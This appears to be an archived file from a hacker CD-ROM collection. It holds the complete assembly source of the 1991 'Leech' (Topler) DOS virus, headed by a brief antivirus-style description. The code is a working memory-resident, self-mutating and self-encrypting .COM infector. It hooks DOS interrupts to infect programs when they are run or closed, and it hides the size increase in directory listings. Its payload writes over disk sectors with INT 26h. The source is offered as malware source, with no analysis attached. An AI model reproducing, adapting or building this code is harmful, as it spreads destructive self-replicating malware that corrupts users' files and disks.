home *** CD-ROM | disk | FTP | other *** search
/ HaCKeRz Kr0nlcKLeZ 1 / HaCKeRz Kr0nlcKLeZ.iso / virus / virusprogramming / leech.asm < prev    next >
Encoding:
Assembly Source File  |  1996-04-16  |  14.7 KB  |  517 lines

  1. Virus Name:  Leech
  2. Aliases:     Leech2, Topler
  3. V Status:    Rare
  4. Discovered:  May, 1991
  5. Symptoms:    .COM file growth; decrease in total system and available
  6.          memory; file dates may disappear
  7. Origin:      Bulgaria
  8. Eff Length:  1,024 Bytes
  9. Type Code:   PRhCK - Parasitic Resident .COM Infector
  10. Detection Method:  ViruScan, F-Prot, Sweep, AVTK, NAV, CPAV, IBMAV, UTScan,
  11.            VirexPC, VBuster, VNet, Panda, MSAV, Vi-Spy, DrVirus,
  12.            NShld, LProt, Sweep/N, Innoc, NProt, AVTK/N, NAV/N
  13. Removal Instructions:  Delete infected files
  14.  
  15.  
  16.  
  17. :
  18. code               segment
  19.            assume cs:code
  20.            org  100h
  21.  
  22. start:
  23.            jmp  begin
  24.  
  25.            org  200h
  26. begin:
  27.            jmp  short beg
  28.  
  29. FileSize           dw   0E00h; 02h
  30. int21vec           dd   0    ; 04h
  31. oldint13           dd   0    ; 08h
  32. oldint24           dd   0    ; 0Ch
  33. Date               dw   0    ; 10h
  34. Time               dw   0    ; 12h
  35.                    db   1    ; 14h
  36. version            dw   0    ; 15h   - mutation status
  37.  
  38. beg:
  39.                    call codenext
  40. codenext:
  41.                    pop  si
  42. mutation1:
  43.                    cli
  44.                    push ds
  45.                    pop  es
  46.                    mov  bp,sp
  47.                    mov  sp,si
  48.                    add  sp,3FEh-(offset codenext-offset begin)
  49. mutation2:
  50.                    mov  cx,ss
  51.                    mov  ax,cs
  52.                    mov  ss,ax
  53.                    pop  bx
  54.                    dec  sp
  55.                    dec  sp
  56.                    add  si,offset mybeg-offset codenext
  57. codeloop:
  58.                    pop  ax
  59.                    xor  al,bh
  60.                    push ax
  61.                    dec  sp
  62.                    cmp  sp,si
  63.                    jnc  codeloop
  64. mybeg:
  65.                    mov  ax,es
  66.                    dec  ax
  67.                    mov  ds,ax
  68.                    add  word ptr ds:[3],-082h
  69.                    mov  bx,ds:[3]
  70.                    mov  byte ptr ds:[0],5ah
  71.                    inc  ax
  72.                    inc  bx
  73.                    add  bx,ax
  74.                    mov  es,bx
  75.                    mov  ss,cx
  76.                    add  si,offset begin-offset mybeg
  77.                    mov  bx,ds
  78.                    mov  ds,ax
  79.                    mov  sp,bp
  80.                    push si
  81.                    xor  di,di
  82.                    mov  cx,400h
  83.                    cld
  84.                    rep  movsb
  85.                    pop  si
  86.                    push bx
  87.                    mov  bx,offset inblock-offset begin
  88.                    push es
  89.                    push bx
  90.                    retf
  91. inblock:
  92.                    mov  es,ax
  93.                    mov  ax,cs:[2]                ; File Size
  94.                    add  ax,100h
  95.                    mov  di,si
  96.                    mov  si,ax
  97.                    mov  cx,400h
  98.                    rep  movsb
  99.                    pop  es
  100.                    xor  ax,ax
  101.                    mov  ds,ax
  102.                    sti
  103.                    cmp  word ptr ds:[21h*4],offset int21-offset begin
  104.                    jne  count
  105.                    sub  word ptr es:[3],-082h
  106.                    test byte ptr ds:[46ch],11100111b
  107.                    jnz  efect1
  108.                    push cs
  109.                    pop  ds
  110.                    mov  si,offset msg-offset begin
  111. efect2:
  112.                    lodsb
  113.                    or   al,0
  114.                    jz   efect3
  115.                    mov  ah,0eh
  116.                    int  10h
  117.                    jmp  short efect2
  118. efect3:
  119.                    mov  ah,32h
  120.                    xor  dl,dl
  121.                    int  21h
  122.                    jc   efect1
  123.                    call setaddr
  124.                    call setint
  125.                    mov  dx,ds:[bx+10h]
  126.                    mov  ah,19h
  127.                    int  21h
  128.                    mov  cx,2
  129.                    int  26h
  130.                    pop  bx
  131.                    call setint
  132. efect1:
  133.                    jmp  quit
  134. count:
  135.                    add  word ptr es:[12h],-082h
  136.                    mov  bx,ds:[46ch]
  137.                    push ds
  138.                    push cs
  139.                    pop  ds
  140.                    push cs
  141.                    pop  es
  142.                    mov  byte ptr ds:[14h],1
  143.                    and  bh,80h
  144.                    mov  ds:[4ffh],bh
  145.                    test bl,00000001b
  146.                    jnz  mut1
  147.                    mov  si,offset mutation1-offset begin
  148.                    add  si,ds:[15h]
  149.                    lodsb
  150.                    xchg al,ds:[si]
  151.                    mov  ds:[si-1],al
  152. mut1:
  153.                    test bl,00000010b
  154.                    jnz  mut2
  155.                    mov  si,offset mutation2-offset begin
  156.                    add  si,ds:[15h]
  157.                    lodsw
  158.                    xchg ax,ds:[si]
  159.                    mov  ds:[si-2],ax
  160. mut2:
  161.                    test bl,00000100b
  162.                    jnz  mut3
  163.                    mov  si,offset codeloop-offset begin
  164.                    mov  al,2
  165.                    xor  byte ptr ds:[si],al
  166.                    xor  byte ptr ds:[si+2],al
  167.                    xor  byte ptr ds:[si+3],al
  168. mut3:
  169.                    test bl,00001000b
  170.                    jnz  mut4
  171.                    mov  si,offset codenext-offset begin
  172.                    mov  di,400h
  173.                    mov  cx,offset codeloop-offset codenext-2
  174.                    push si
  175.                    push di
  176.                    lodsb
  177.                    cmp  al,5eh
  178.                    je   jmp1
  179.                    inc  si
  180. jmp1:
  181.                    push cx
  182.                    rep  movsb
  183.                    pop  cx
  184.                    pop  si
  185.                    pop  di
  186.                    cmp  al,5eh
  187.                    je   jmp2
  188.                    mov  al,5Eh
  189.                    stosb
  190.                    rep  movsb
  191.                    mov  al,90h
  192.                    stosb
  193.                    xor  ax,ax
  194.                    jmp  short jmp3
  195. jmp2:
  196.                    mov  ax,0C68Fh
  197.                    stosw
  198.                    rep  movsb
  199.                    mov  ax,1
  200. jmp3:
  201.                    mov  cs:[15h],ax
  202. mut4:
  203.                    mov  ah,30h
  204.                    int  21h
  205.                    cmp  ax,1e03h
  206.                    jne  nodos33
  207.                    mov  ah,34h
  208.                    int  21h
  209.                    mov  bx,1460h
  210.                    jmp  short dos33
  211. nodos33:
  212.                    mov  ax,3521h
  213.                    int  21h
  214. dos33:
  215.                    mov  ds:[4],bx
  216.                    mov  ds:[6],es
  217.                    mov  si,21h*4
  218.                    pop  ds
  219.                    push si
  220.                    push cs
  221.                    pop  es
  222.                    mov  di,offset intend-offset begin+1
  223.                    movsw
  224.                    movsw
  225.                    pop  di
  226.                    push ds
  227.                    pop  es
  228.                    mov  ax,offset int21-offset begin
  229.                    stosw
  230.                    mov  ax,cs
  231.                    stosw
  232.                    mov  di,offset mybeg-offset begin
  233.                    mov  al,cs:[3ffh]
  234. coderloop:
  235.                    xor  cs:[di],al
  236.                    inc  di
  237.                    cmp  di,offset coderloop-offset begin
  238.                    jc   coderloop
  239. quit:
  240.                    mov  ah,62h
  241.                    int  21h
  242.                    push bx
  243.                    mov  ds,bx
  244.                    mov  es,bx
  245.                    mov  ax,100h
  246.                    push ax
  247.                    retf
  248. ;------------------------------------------------------------------------------
  249. infect:
  250.                    push si
  251.                    push ds
  252.                    push es
  253.                    push di
  254.                    cld
  255.                    push cs
  256.                    pop  ds
  257.                    xor  dx,dx
  258.                    call movefp
  259.                    mov  dx,400h
  260.                    mov  ah,3fh
  261.                    mov  cx,3
  262.                    call Dos
  263.                    jc   infect4
  264.                    xor  di,di
  265.                    mov  ax,word ptr ds:[400h]
  266.                    mov  cx,ds:[0]
  267.                    cmp  cx,ax
  268.                    je   infect8
  269.                    cmp  al,0EBH  ; near jmp
  270.                    jne  infect1
  271.                    mov  al,ah
  272.                    xor  ah,ah
  273.                    add  ax,2
  274.                    mov  di,ax
  275. infect1:
  276.                    cmp  al,0E9h  ; far jmp
  277.                    jne  infect2
  278.                    mov  ax,ds:[401h]
  279.                    add  ax,3
  280.                    mov  di,ax
  281.                    xor  ax,ax
  282. infect2:
  283.                    cmp  ax,'MZ'
  284.                    je   infect4
  285.                    cmp  ax,'ZM'
  286.                    jne  infect3
  287. infect4:
  288.                    stc
  289. infect8:
  290.                    jmp  infectquit
  291. infect3:
  292.                    mov  dx,di
  293.                    push cx
  294.                    call movefp
  295.                    mov  dx,400h
  296.                    mov  ah,3fh
  297.                    mov  cx,dx
  298.                    call Dos
  299.                    pop  cx
  300.                    jc   infect4
  301.                    cmp  ds:[400h],cx
  302.                    je   infect8
  303.                    mov  ax,di
  304.                    sub  ah,-4
  305.                    cmp  ax,ds:[2]
  306.                    jnc  infect4
  307.                    mov  dx,ds:[2]
  308.                    call movefp
  309.                    mov  dx,400h
  310.                    mov  cx,dx
  311.                    mov  ah,40h
  312.                    call Dos
  313. infect6:
  314.                    jc   infectquit
  315.                    mov  dx,di
  316.                    call movefp
  317.                    push cs
  318.                    pop  es
  319.                    mov  di,400h
  320.                    push di
  321.                    push di
  322.                    xor  si,si
  323.                    mov  cx,di
  324.                    rep  movsb
  325.                    mov  si,400h+offset coderloop-offset begin
  326.                    mov  al,ds:[7ffh]
  327. infect5:
  328.                    xor  ds:[si],al
  329.                    inc  si
  330.                    cmp  si,07ffh
  331.                    jc   infect5
  332.                    pop  cx
  333.                    pop  dx
  334.                    mov  ah,40h
  335.                    call Dos
  336. infectquit:
  337.                    pop  di
  338.                    pop  es
  339.                    pop  ds
  340.                    pop  si
  341.                    ret
  342. int21:
  343.                    cmp  ax,4b00h
  344.                    je   exec
  345.                    cmp  ah,3eh
  346.                    je   close
  347.                    cmp  ah,11h
  348.                    je   dir
  349.                    cmp  ah,12h
  350.                    je   dir
  351. intend:
  352.                    db   0eah,0,0,0,0
  353.  
  354. dir:
  355.                    push si
  356.                    mov  si,offset intend-offset begin+1
  357.                    pushf
  358.                    call dword ptr cs:[si]
  359.                    pop  si
  360.                    push ax
  361.                    push bx
  362.                    push es
  363.                    mov  ah,2fh
  364.                    call dos
  365.                    cmp  byte ptr es:[bx],0ffh
  366.                    jne  dir2
  367.                    add  bx,7
  368. dir2:
  369.                    mov  ax,es:[bx+17h]
  370.                    and  ax,1fh
  371.                    cmp  ax,1eh
  372.                    jne  dir1
  373.                    mov  ax,es:[bx+1dh]
  374.                    cmp  ax,0801h
  375.                    jc   dir1
  376.                    sub  ax,400h
  377.                    mov  es:[bx+1dh],ax
  378. dir1:
  379.                    pop  es
  380.                    pop  bx
  381.                    pop  ax
  382.                    iret
  383. int24:
  384.                    mov  al,3
  385.                    iret
  386. Dos:
  387.                    pushf
  388.                    call dword ptr cs:[4]
  389.                    ret
  390. moveFP:
  391.                    xor  cx,cx
  392.                    mov  ax,4200h
  393.                    call Dos
  394.                    ret
  395. exec:
  396.                    push ax
  397.                    push bx
  398.                    mov  byte ptr cs:[14h],0
  399.                    mov  ax,3d00h
  400.                    call dos
  401.                    mov  bx,ax
  402.                    mov  ah,3eh
  403.                    int  21h
  404.                    pop  bx
  405.                    pop  ax
  406. intendjmp:
  407.                    jmp  short intend
  408. close:
  409.                    or   byte ptr cs:[14h],0
  410.                    jnz  intendjmp
  411.                    push cx
  412.                    push dx
  413.                    push di
  414.                    push es
  415.                    push ax
  416.                    push bx
  417.                    call setaddr
  418.                    call setint
  419.                    mov  ax,1220h
  420.                    int  2fh
  421.                    jc   closequit
  422.                    mov  ax,1216h
  423.                    mov  bl,es:[di]
  424.                    xor  bh,bh
  425.                    int  2fh
  426.                    mov  ax,es:[di+11h]
  427.                    mov  cs:[2],ax
  428.                    mov  ax,es:[di+0dh]
  429.                    and  al,0f8h
  430.                    mov  cs:[12h],ax
  431.                    mov  ax,es:[di+0fh]
  432.                    mov  cs:[10h],ax
  433.                    cmp  word ptr es:[di+29h],'MO'
  434.                    jne  closequit
  435.                    cmp  byte ptr es:[di+28h],'C'
  436.                    jne  closequit
  437.                    cmp  cs:[2],0FA00h
  438.                    jnc  closequit
  439.                    mov  al,20h
  440.                    xchg al,es:[di+4]
  441.                    mov  ah,2
  442.                    xchg es:[di+2],ah
  443.                    pop  bx
  444.                    push bx
  445.                    push ax
  446.                    call infect
  447.                    pop  ax
  448.                    mov  es:[di+4],al
  449.                    mov  es:[di+2],ah
  450.                    mov  cx,cs:[12h]
  451.                    jc   close1
  452.                    or   cl,1fh
  453.                    and  cl,0feh
  454. close1:
  455.                    mov  dx,cs:[10h]
  456.                    mov  ax,5701h
  457.                    call Dos
  458. closequit:
  459.                    pop  bx
  460.                    pop  ax
  461.                    pop  es
  462.                    pop  di
  463.                    pop  dx
  464.                    pop  cx
  465.                    call dos
  466.                    call setint
  467.                    retf 02
  468. setaddr:
  469.                    mov  ah,13h
  470.                    int  2fh
  471.                    mov  cs:[8d],bx
  472.                    mov  cs:[10d],es
  473.                    int  2fh
  474.                    mov  cs:[12d],offset int24-offset begin
  475.                    mov  cs:[14d],cs
  476.                    ret
  477. setint:
  478.                    push ax
  479.                    push si
  480.                    push ds
  481.                    pushf
  482.                    cli
  483.                    cld
  484.                    xor  ax,ax
  485.                    mov  ds,ax
  486.                    mov  si,13h*4
  487.                    lodsw
  488.                    xchg ax,cs:[8]
  489.                    mov  ds:[si-2],ax
  490.                    lodsw
  491.                    xchg ax,cs:[10d]
  492.                    mov  ds:[si-2],ax
  493.                    mov  si,24h*4
  494.                    lodsw
  495.                    xchg ax,cs:[12d]
  496.                    mov  ds:[si-2],ax
  497.                    lodsw
  498.                    xchg ax,cs:[14d]
  499.                    mov  ds:[si-2],ax
  500.                    popf
  501.                    pop  ds
  502.                    pop  si
  503.                    pop  ax
  504.                    ret
  505. msg:
  506.                    db   'The leech live ...',0
  507.                    db   'April 1991  The Topler.',0
  508.  
  509.                    org  0F00h
  510.  
  511.                    int  20h
  512.  
  513. code               ends
  514.                    end  start
  515. 
  516.  
  517.